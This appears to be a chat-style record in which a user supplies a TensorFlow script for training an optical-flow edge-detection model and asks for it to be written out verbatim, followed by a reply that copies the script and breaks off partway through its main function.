flo, true_edge= build_tfrecord_input(training=True)\n \n split_image = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=image)\n split_flo = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=flo)\n split_true_edge = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=true_edge)\n \n image_eval, mask_eval = build_tfrecord_input_eval()\n \n summaries_cpu = tf.get_collection(tf.GraphKeys.SUMMARIES, tf.get_variable_scope().name)\n\n with tf.variable_scope(tf.get_variable_scope()) as vs:\n for i in xrange(FLAGS.num_gpus):\n with tf.device('/gpu:%d' % i):\n if i == FLAGS.num_gpus - 1:\n scopename = \"model\"\n else:\n scopename = '%s_%d' % (\"tower\", i)\n with tf.name_scope(scopename) as ns:\n if i == 0:\n model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=False, scope=vs)\n else:\n model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=True, scope=vs)\n \n loss = model.loss\n # Retain the summaries from the final tower.\n if i == FLAGS.num_gpus - 1:\n summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, ns)\n eval_model = Model_eval(image_eval, mask_eval, scope=vs)\n\n # Calculate the gradients for the batch of data on this CIFAR tower.\n grads = train_op.compute_gradients(loss)\n\n # Keep track of the gradients across all towers.\n tower_grads.append(grads)\n itr_placeholders.append(model.iter_num)\n \n \n # We must calculate the mean of each gradient. Note that this is the\n # synchronization point across all towers.\n grads = average_gradients(tower_grads)\n\n # Apply the gradients to adjust the shared variables.\n apply_gradient_op = train_op.apply_gradients(grads)\n\n # Create a saver.\n saver = tf.train.Saver(\n tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=5)\n\n # Build the summary operation from the last tower summaries.\n summary_op = tf.summary.merge(summaries + summaries_cpu)\n\n # Make training session.\n sess = tf.Session(config=tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False))\n summary_writer = tf.summary.FileWriter(\n FLAGS.output_dir, graph=sess.graph, flush_secs=10)\n \n if FLAGS.pretrained_model:\n saver.restore(sess, FLAGS.pretrained_model)\n start_itr = int(FLAGS.pretrained_model.split(\"/\")[-1][5:])\n else:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n start_itr = 0\n \n tf.train.start_queue_runners(sess)\n \n # Run training.\n for itr in range(start_itr, FLAGS.num_iterations):\n # Generate new batch of data.\n feed_dict = {x:np.float32(itr) for x in itr_placeholders}\n _, summary_str = sess.run([apply_gradient_op, summary_op],\n feed_dict)\n \n if (itr) % SAVE_INTERVAL == 2:\n orig_image1, flo, true_edge, \\\n pred_edge = sess.run([model.orig_image1, \n model.flo, \n model.true_edge,\n model.pred_edge],\n feed_dict)\n \n if (itr) % (SAVE_INTERVAL*10) == 2:\n tf.logging.info('Saving model.')\n saver.save(sess, FLAGS.output_dir + '/model' + str(itr))\n plot_flo_edge(orig_image1, flo, true_edge, pred_edge,\n output_dir=FLAGS.output_dir, itr=itr)\n \n# eval_summary_str, eval_image, eval_mask_true, eval_mask_pred = sess.run([eval_model.summ_op, \n# eval_model.image, \n# eval_model.mask_true, \n# eval_model.mask_pred])\n# \n# plot_eval(eval_image, eval_mask_true, eval_mask_pred, \n# output_dir=FLAGS.output_dir, itr=itr)\n \n if (itr) % SUMMARY_INTERVAL:\n summary_writer.add_summary(summary_str, itr)\n \n# if (itr) % SUMMARY_INTERVAL*2 :\n# eval_summary_str = sess.run(eval_model.summ_op)\n# summary_writer.add_summary(eval_summary_str, itr)\n \n tf.logging.info('Saving model.')\n saver.save(sess, FLAGS.output_dir + '/model')\n tf.logging.info('Training complete')\n tf.logging.flush\n \n\nif __name__ == '__main__':\n app.run()\n```\nWrite out the full code verbatim.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n# Copyright 2016 The TensorFlow Authors All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nfrom tensorflow.examples.tutorials.mnist.mnist import loss\n\n\"\"\"Code for training the prediction model.\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.python.platform import app\nfrom tensorflow.python.platform import flags\n\nfrom prediction_input_flo_edge import build_tfrecord_input, DATA_DIR\nfrom prediction_input_flo_eval import build_tfrecord_input_eval\nfrom prediction_model_flo_edge import construct_model\nfrom visualize import plot_flo, plot_eval, plot_flo_edge\nfrom optical_flow_warp import transformer\n\nimport os\n\n# How often to record tensorboard summaries.\nSUMMARY_INTERVAL = 40\n\n# How often to run a batch through the validation model.\nVAL_INTERVAL = 200\n\n# How often to save a model checkpoint\nSAVE_INTERVAL = 500\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('data_dir', DATA_DIR, 'directory containing data.')\nflags.DEFINE_string('output_dir', \"\", 'directory for model checkpoints.')\nflags.DEFINE_integer('num_iterations', 100000, 'number of training iterations.')\nflags.DEFINE_string('pretrained_model', '',\n 'filepath of a pretrained model to initialize from.')\n\nflags.DEFINE_float('train_val_split', 1.0,\n 'The percentage of files to use for the training set,'\n ' vs. the validation set.')\n\nflags.DEFINE_integer('batch_size', 32, 'batch size for training')\nflags.DEFINE_float('learning_rate', 0.001,\n 'the base learning rate of the generator')\nflags.DEFINE_integer('num_gpus', 1,\n 'the number of gpu to use')\n\n\ndef get_black_list(clses):\n blacklist = []\n for cls in clses:\n fname = \"/home/wangyang59/Data/ILSVRC2016/ImageSets/VID/train_%s.txt\" % cls\n with open(fname) as f:\n content = f.readlines()\n blacklist += [x.split(\" \")[0].split(\"/\")[-1] + \".tfrecord\" for x in content]\n return blacklist\n\n## Helper functions\ndef peak_signal_to_noise_ratio(true, pred):\n \"\"\"Image quality metric based on maximal signal power vs. power of the noise.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n peak signal to noise ratio (PSNR)\n \"\"\"\n return 10.0 * tf.log(1.0 / mean_squared_error(true, pred)) / tf.log(10.0)\n\n\ndef mean_squared_error(true, pred):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.square(true - pred)) / tf.to_float(tf.size(pred))\n\ndef weighted_mean_squared_error(true, pred, weight):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n \n tmp = tf.reduce_sum(weight*tf.square(true-pred), axis=[1,2], keep_dims=True) / tf.reduce_sum(weight, axis=[1, 2], keep_dims=True)\n return tf.reduce_mean(tmp)\n #return tf.reduce_sum(tf.square(true - pred)*weight) / tf.to_float(tf.size(pred))\n #return tf.reduce_sum(tf.square(true - pred)*weight) / tf.reduce_sum(weight)\n\ndef mean_L1_error(true, pred):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.abs(true - pred)) / tf.to_float(tf.size(pred))\n\ndef weighted_mean_L1_error(true, pred, weight):\n \"\"\"L2 distance between tensors true and pred.\n\n Args:\n true: the ground truth image.\n pred: the predicted image.\n Returns:\n mean squared error between ground truth and predicted image.\n \"\"\"\n return tf.reduce_sum(tf.abs(true - pred)*weight) / tf.to_float(tf.size(pred))\n\ndef huber_error(true, pred, delta=0.05):\n err = true - pred \n herr = tf.where(tf.abs(err)<delta, 0.5*tf.square(err), delta*(tf.abs(err) - 0.5*delta)) # condition, true, false\n return tf.reduce_sum(herr) / tf.to_float(tf.size(pred))\n\ndef cal_grad_error_wmask(image, mask, kernels):\n \"\"\"Calculate the gradient of the given image by calculate the difference between nearby pixels\n \"\"\"\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n \n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]\n for kernel in kernels:\n shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n error += weighted_mean_squared_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :], cropped_mask)\n \n return error / len(kernels)\n \ndef cal_grad_error(image, kernels):\n \"\"\"Calculate the gradient of the given image by calculate the difference between nearby pixels\n \"\"\"\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n for kernel in kernels:\n shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n error += mean_L1_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :])\n \n return error / len(kernels)\n\ndef cal_weighted_var(image, mask):\n \n weighted_mean = tf.reduce_sum(image*mask, axis=[1, 2], keep_dims=True) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)\n #mean = tf.reduce_mean(image, axis=[1, 2], keep_dims=True)\n weighted_var = (tf.reduce_sum(mask*tf.square(image - weighted_mean), axis=[1,2], keep_dims=True) + 0.0) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)\n \n return tf.reduce_mean(weighted_var)\n \ndef cal_weighted_edge_diff(image, mask, kernels, scale=1.0):\n error = 0.0\n img_height, img_width, color_channels = map(int, image.get_shape()[1:4])\n cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]\n cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]\n \n for kernel in kernels:\n shifted_image = (tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]\n shifted_mask = (tf.nn.depthwise_conv2d(mask, tf.tile(kernel, [1, 1, 1, 1]), \n [1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]\n \n tmp = tf.exp(-tf.reduce_sum(tf.square(shifted_image-cropped_image), axis=[3], keep_dims=True) / scale) * tf.square(shifted_mask-cropped_mask)\n \n error += tf.reduce_sum(tmp) / tf.to_float(tf.size(shifted_mask))\n \n return error / len(kernels)\n\ndef create_flo_edge(flo, kernels):\n batch_size, img_height, img_width, color_channels = map(int, flo.get_shape()[0:4])\n \n flo_shift_v = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[0], [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n flo_shift_h = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[1], [1, 1, color_channels, 1]), \n [1, 1, 1, 1], 'SAME')\n \n pos = tf.constant(1.0, shape=[batch_size, img_height, img_width, 1])\n neg = tf.constant(0.0, shape=[batch_size, img_height, img_width, 1])\n \n true_edge = tf.where(tf.reduce_max(tf.concat([tf.abs(flo-flo_shift_h), tf.abs(flo-flo_shift_v)], axis=[3]), \n axis=[3], keep_dims=True)>0.5, \n x=pos, y=neg)\n \n# true_edge_h = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_h), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)\n# true_edge_v = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_v), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)\n \n return true_edge\n\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n\n Note that this function provides a synchronization point across all towers.\n\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\nclass Model(object):\n\n def __init__(self,\n image1=None,\n flo=None,\n true_edge=None,\n reuse_scope=False,\n scope=None,\n prefix=\"train\"):\n\n #self.prefix = prefix = tf.placeholder(tf.string, [])\n self.iter_num = tf.placeholder(tf.float32, [])\n summaries = []\n \n self.kernels = []\n for i in xrange(4):\n kernel = np.zeros((3 * 3), dtype=np.float32)\n kernel[i*2 + 1] = 1.0\n kernel = kernel.reshape((3, 3, 1, 1))\n kernel = tf.constant(kernel, shape=(3, 3, 1, 1), \n name='kernel_shift'+str(i), verify_shape=True)\n self.kernels.append(kernel)\n \n if not reuse_scope:\n edge_mask = construct_model(image1)\n else: # If it's a validation or test model.\n with tf.variable_scope(scope, reuse=True):\n edge_mask = construct_model(image1)\n \n #flo_mag = tf.sqrt(tf.square(flo[:,:,:,0:1]) + tf.square(flo[:,:,:,1:2]))\n# true_edge_h, true_edge_v, true_edge = create_flo_edge(flo, self.kernels)\n \n loss = -tf.reduce_mean(true_edge*tf.log(edge_mask+1e-10) + (1.0-true_edge)*tf.log(1.0-edge_mask+1e-10))\n #loss_v = -tf.reduce_mean(true_edge_v*tf.log(edge_mask_v+1e-10) + (1.0-true_edge_v)*tf.log(1.0-edge_mask_v+1e-10))\n \n self.loss = loss\n self.orig_image1 = image1\n self.flo = flo\n self.true_edge = true_edge\n self.pred_edge = edge_mask\n \n summaries.append(tf.summary.scalar(prefix + '_loss', self.loss))\n \n self.summ_op = tf.summary.merge(summaries)\n \nclass Model_eval(object):\n\n def __init__(self,\n image=None,\n mask=None,\n scope=None):\n\n #self.prefix = prefix = tf.placeholder(tf.string, [])\n self.iter_num = tf.placeholder(tf.float32, [])\n summaries = []\n \n self.kernels = []\n for i in xrange(4):\n kernel = np.zeros((3 * 3), dtype=np.float32)\n kernel[i*2 + 1] = 1.0\n kernel = kernel.reshape((3, 3, 1, 1))\n kernel = tf.constant(kernel, shape=(3, 3, 1, 1), \n name='kernel_shift'+str(i), verify_shape=True)\n self.kernels.append(kernel)\n \n batch_size, img_height, img_width = map(int, image.get_shape()[0:3])\n \n with tf.variable_scope(scope, reuse=True):\n edge_mask_h = construct_model(image)\n \n #self.summ_op = tf.summary.merge(summaries)\n self.image = image\n self.mask_true = mask\n self.pred_edge_h = edge_mask_h\n \ndef main(unused_argv):\n if FLAGS.output_dir == \"\":\n raise Exception(\"OUT_DIR must be specified\")\n \n if os.path.exists(FLAGS.output_dir):\n raise Exception(\"OUT_DIR already exist\")\n \n print 'Constructing models and inputs.'\n \n with tf.Graph().as_default(), tf.device('/cpu:0'):\n train_op = tf.train.AdamOptimizer(FLAGS.learning_rate)\n \n tower_grads = []\n itr_placeholders = []\n \n image, flo, true_edge= build_tfrecord_input(training=True)\n \n split_image = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=image)\n split_flo = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=flo)\n split_true_edge = tf.split(axis=0, num_or_size_splits=FLAGS.num_gpus, value=true_edge)\n \n image_eval, mask_eval = build_tfrecord_input_eval()\n \n summaries_cpu = tf.get_collection(tf.GraphKeys.SUMMARIES, tf.get_variable_scope().name)\n\n with tf.variable_scope(tf.get_variable_scope()) as vs:\n for i in xrange(FLAGS.num_gpus):\n with tf.device('/gpu:%d' % i):\n if i == FLAGS.num_gpus - 1:\n scopename = \"model\"\n else:\n scopename = '%s_%d' % (\"tower\", i)\n with tf.name_scope(scopename) as ns:\n if i == 0:\n model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=False, scope=vs)\n else:\n model = Model(split_image[i], split_flo[i], split_true_edge[i], reuse_scope=True, scope=vs)\n \n loss = model.loss\n # Retain the summaries from the final tower.\n if i == FLAGS.num_gpus - 1:\n summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, ns)\n eval_model = Model_eval(image_eval, mask_eval, scope=vs)\n\n # Calculate the gradients for the batch of data on this CIFAR tower.\n grads = train_op.compute_gradients(loss)\n\n # Keep track of the gradients across all towers.\n tower_grads.append(grads)\n itr_placeholders.append(model.iter_num)\n \n \n # We must calculate the mean of each gradient. Note that this is the\n # synchronization point across all towers.\n grads = average_gradients(tower_grads)\n\n # Apply the gradients to adjust the shared variables.\n apply_gradient_op = train_op.apply_gradients(grads)\n\n # Create a saver.\n saver = tf.train.Saver(\n tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=5)\n\n # Build the summary operation from the last tower summaries.\n summary_op = tf.summary.merge(summaries + summaries_cpu)\n\n # Make training session.\n sess = tf.Session(config=tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False))\n summary_writer = tf.summary.FileWriter(\n FLAGS.output_dir, graph=sess.graph, flush_secs=10)\n \n if FLAGS.pretrained_model:\n saver.restore(sess, FLAGS.pretrained_model)\n start_itr = int(FLAGS.pretrained_model.split(\"/\")[-1][5:])\n else:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n start_itr = 0\n \n tf.train.start_queue_runners(sess)\n \n # Run training.\n for itr in range(start_itr, FLAGS.num_iterations):\n # Generate new batch of data.\n feed_dict = {x:np.float32(itr) for x in itr_placeholders}\n _, summary_str = sess.run([apply_gradient_op, summary_op],\n feed_dict)\n \n if (itr) % SAVE_INTERVAL == 2:\n orig_image1, flo, true_edge, \\\n pred_edge = sess.run([model.orig_image1, \n model.flo, \n model.true_edge,\n model.pred_edge],\n feed_dict)\n \n if (itr) % (SAVE_INTERVAL*10) == 2:\n tf.logging.info('Saving model.')\n saver.save(sess, FLAGS.output_dir + '/model' + str(itr))\n plot_flo_edge(orig_image1, flo, true_edge, pred_edge,\n output_dir=FLAGS.output_dir, itr=itr)\n \n# eval_summary_str, eval_image, eval_mask_true, eval_mask_pred = sess.run([eval_model.summ_op, \n# eval_model.image, \n# eval_model.mask_true, \n# eval_model.mask_pred])\n# \n# plot_eval(eval_image, eval_mask_true, eval_mask_pred, \n# output_dir=FLAGS.output_dir, itr=itr)\n \n if (itr) % SUMMARY_INTERVAL:\n summary_writer.add_summary(summary_str, itr)\n \n# if (itr) % SUMMARY_INTERVAL*2 :\n# eval_summary_str = sess.run(eval_model.summ_op)\n# summary_writer.add_summary(eval_summary_str, itr)\n \n tf.logging.info('Saving model.')\n saver.save(sess, FLAGS.output_dir + '/model')\n tf.logging.info('Training complete')\n tf.logging.flush\n \n\nif __name__ == '__main__':\n app.run()\n```<|memory_end|>\nWrite out the full code verbatim.",
"role": "user"
}
] |
```python
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from tensorflow.examples.tutorials.mnist.mnist import loss
"""Code for training the prediction model."""
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.platform import flags
from prediction_input_flo_edge import build_tfrecord_input, DATA_DIR
from prediction_input_flo_eval import build_tfrecord_input_eval
from prediction_model_flo_edge import construct_model
from visualize import plot_flo, plot_eval, plot_flo_edge
from optical_flow_warp import transformer
import os
# How often to record tensorboard summaries.
SUMMARY_INTERVAL = 40
# How often to run a batch through the validation model.
VAL_INTERVAL = 200
# How often to save a model checkpoint
SAVE_INTERVAL = 500
FLAGS = flags.FLAGS
flags.DEFINE_string('data_dir', DATA_DIR, 'directory containing data.')
flags.DEFINE_string('output_dir', "", 'directory for model checkpoints.')
flags.DEFINE_integer('num_iterations', 100000, 'number of training iterations.')
flags.DEFINE_string('pretrained_model', '',
'filepath of a pretrained model to initialize from.')
flags.DEFINE_float('train_val_split', 1.0,
'The percentage of files to use for the training set,'
' vs. the validation set.')
flags.DEFINE_integer('batch_size', 32, 'batch size for training')
flags.DEFINE_float('learning_rate', 0.001,
'the base learning rate of the generator')
flags.DEFINE_integer('num_gpus', 1,
'the number of gpu to use')
def get_black_list(clses):
blacklist = []
for cls in clses:
fname = "/home/wangyang59/Data/ILSVRC2016/ImageSets/VID/train_%s.txt" % cls
with open(fname) as f:
content = f.readlines()
blacklist += [x.split(" ")[0].split("/")[-1] + ".tfrecord" for x in content]
return blacklist
## Helper functions
def peak_signal_to_noise_ratio(true, pred):
"""Image quality metric based on maximal signal power vs. power of the noise.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
peak signal to noise ratio (PSNR)
"""
return 10.0 * tf.log(1.0 / mean_squared_error(true, pred)) / tf.log(10.0)
def mean_squared_error(true, pred):
"""L2 distance between tensors true and pred.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
mean squared error between ground truth and predicted image.
"""
return tf.reduce_sum(tf.square(true - pred)) / tf.to_float(tf.size(pred))
def weighted_mean_squared_error(true, pred, weight):
"""L2 distance between tensors true and pred.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
mean squared error between ground truth and predicted image.
"""
tmp = tf.reduce_sum(weight*tf.square(true-pred), axis=[1,2], keep_dims=True) / tf.reduce_sum(weight, axis=[1, 2], keep_dims=True)
return tf.reduce_mean(tmp)
#return tf.reduce_sum(tf.square(true - pred)*weight) / tf.to_float(tf.size(pred))
#return tf.reduce_sum(tf.square(true - pred)*weight) / tf.reduce_sum(weight)
def mean_L1_error(true, pred):
"""L2 distance between tensors true and pred.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
mean squared error between ground truth and predicted image.
"""
return tf.reduce_sum(tf.abs(true - pred)) / tf.to_float(tf.size(pred))
def weighted_mean_L1_error(true, pred, weight):
"""L2 distance between tensors true and pred.
Args:
true: the ground truth image.
pred: the predicted image.
Returns:
mean squared error between ground truth and predicted image.
"""
return tf.reduce_sum(tf.abs(true - pred)*weight) / tf.to_float(tf.size(pred))
def huber_error(true, pred, delta=0.05):
err = true - pred
herr = tf.where(tf.abs(err)<delta, 0.5*tf.square(err), delta*(tf.abs(err) - 0.5*delta)) # condition, true, false
return tf.reduce_sum(herr) / tf.to_float(tf.size(pred))
def cal_grad_error_wmask(image, mask, kernels):
"""Calculate the gradient of the given image by calculate the difference between nearby pixels
"""
error = 0.0
img_height, img_width, color_channels = map(int, image.get_shape()[1:4])
cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]
cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]
for kernel in kernels:
shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]),
[1, 1, 1, 1], 'SAME')
error += weighted_mean_squared_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :], cropped_mask)
return error / len(kernels)
def cal_grad_error(image, kernels):
"""Calculate the gradient of the given image by calculate the difference between nearby pixels
"""
error = 0.0
img_height, img_width, color_channels = map(int, image.get_shape()[1:4])
cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]
for kernel in kernels:
shifted_image = tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]),
[1, 1, 1, 1], 'SAME')
error += mean_L1_error(cropped_image, shifted_image[:, 1:(img_height-1), 1:(img_width-1), :])
return error / len(kernels)
def cal_weighted_var(image, mask):
weighted_mean = tf.reduce_sum(image*mask, axis=[1, 2], keep_dims=True) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)
#mean = tf.reduce_mean(image, axis=[1, 2], keep_dims=True)
weighted_var = (tf.reduce_sum(mask*tf.square(image - weighted_mean), axis=[1,2], keep_dims=True) + 0.0) / tf.reduce_sum(mask, axis=[1, 2], keep_dims=True)
return tf.reduce_mean(weighted_var)
def cal_weighted_edge_diff(image, mask, kernels, scale=1.0):
error = 0.0
img_height, img_width, color_channels = map(int, image.get_shape()[1:4])
cropped_image = image[:, 1:(img_height-1), 1:(img_width-1), :]
cropped_mask = mask[:, 1:(img_height-1), 1:(img_width-1), :]
for kernel in kernels:
shifted_image = (tf.nn.depthwise_conv2d(image, tf.tile(kernel, [1, 1, color_channels, 1]),
[1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]
shifted_mask = (tf.nn.depthwise_conv2d(mask, tf.tile(kernel, [1, 1, 1, 1]),
[1, 1, 1, 1], 'SAME'))[:, 1:(img_height-1), 1:(img_width-1), :]
tmp = tf.exp(-tf.reduce_sum(tf.square(shifted_image-cropped_image), axis=[3], keep_dims=True) / scale) * tf.square(shifted_mask-cropped_mask)
error += tf.reduce_sum(tmp) / tf.to_float(tf.size(shifted_mask))
return error / len(kernels)
def create_flo_edge(flo, kernels):
batch_size, img_height, img_width, color_channels = map(int, flo.get_shape()[0:4])
flo_shift_v = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[0], [1, 1, color_channels, 1]),
[1, 1, 1, 1], 'SAME')
flo_shift_h = tf.nn.depthwise_conv2d(flo, tf.tile(kernels[1], [1, 1, color_channels, 1]),
[1, 1, 1, 1], 'SAME')
pos = tf.constant(1.0, shape=[batch_size, img_height, img_width, 1])
neg = tf.constant(0.0, shape=[batch_size, img_height, img_width, 1])
true_edge = tf.where(tf.reduce_max(tf.concat([tf.abs(flo-flo_shift_h), tf.abs(flo-flo_shift_v)], axis=[3]),
axis=[3], keep_dims=True)>0.5,
x=pos, y=neg)
# true_edge_h = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_h), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)
# true_edge_v = tf.where(tf.reduce_max(tf.abs(flo-flo_shift_v), axis=[3], keep_dims=True)>0.3, x=pos, y=neg)
return true_edge
def average_gradients(tower_grads):
"""Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list
is over individual gradients. The inner list is over the gradient
calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
class Model(object):
def __init__(self,
image1=None,
flo=None,
true_edge=None,
reuse_scope=False,
scope=None,
prefix="train"):
#self.prefix = prefix = tf.placeholder(tf.string, [])
self.iter_num = tf.placeholder(tf.float32, [])
summaries = []
self.kernels = []
for i in xrange(4):
kernel = np.zeros((3 * 3), dtype=np.float32)
kernel[i*2 + 1] = 1.0
kernel = kernel.reshape((3, 3, 1, 1))
kernel = tf.constant(kernel, shape=(3, 3, 1, 1),
name='kernel_shift'+str(i), verify_shape=True)
self.kernels.append(kernel)
if not reuse_scope:
edge_mask = construct_model(image1)
else: # If it's a validation or test model.
with tf.variable_scope(scope, reuse=True):
edge_mask = construct_model(image1)
#flo_mag = tf.sqrt(tf.square(flo[:,:,:,0:1]) + tf.square(flo[:,:,:,1:2]))
# true_edge_h, true_edge_v, true_edge = create_flo_edge(flo, self.kernels)
loss = -tf.reduce_mean(true_edge*tf.log(edge_mask+1e-10) + (1.0-true_edge)*tf.log(1.0-edge_mask+1e-10))
#loss_v = -tf.reduce_mean(true_edge_v*tf.log(edge_mask_v+1e-10) + (1.0-true_edge_v)*tf.log(1.0-edge_mask_v+1e-10))
self.loss = loss
self.orig_image1 = image1
self.flo = flo
self.true_edge = true_edge
self.pred_edge = edge_mask
summaries.append(tf.summary.scalar(prefix + '_loss', self.loss))
self.summ_op = tf.summary.merge(summaries)
class Model_eval(object):
def __init__(self,
image=None,
mask=None,
scope=None):
#self.prefix = prefix = tf.placeholder(tf.string, [])
self.iter_num = tf.placeholder(tf.float32, [])
summaries = []
self.kernels = []
for i in xrange(4):
kernel = np.zeros((3 * 3), dtype=np.float32)
kernel[i*2 + 1] = 1.0
kernel = kernel.reshape((3, 3, 1, 1))
kernel = tf.constant(kernel, shape=(3, 3, 1, 1),
name='kernel_shift'+str(i), verify_shape=True)
self.kernels.append(kernel)
batch_size, img_height, img_width = map(int, image.get_shape()[0:3])
with tf.variable_scope(scope, reuse=True):
edge_mask_h = construct_model(image)
#self.summ_op = tf.summary.merge(summaries)
self.image = image
self.mask_true = mask
self.pred_edge_h = edge_mask_h
def main(unused_argv):
if FLAGS.output_dir == "":
raise Exception("OUT_DIR must be specified")
if os.path.exists(FLAGS.output_dir):
raise Exception("OUT_DIR already exist")
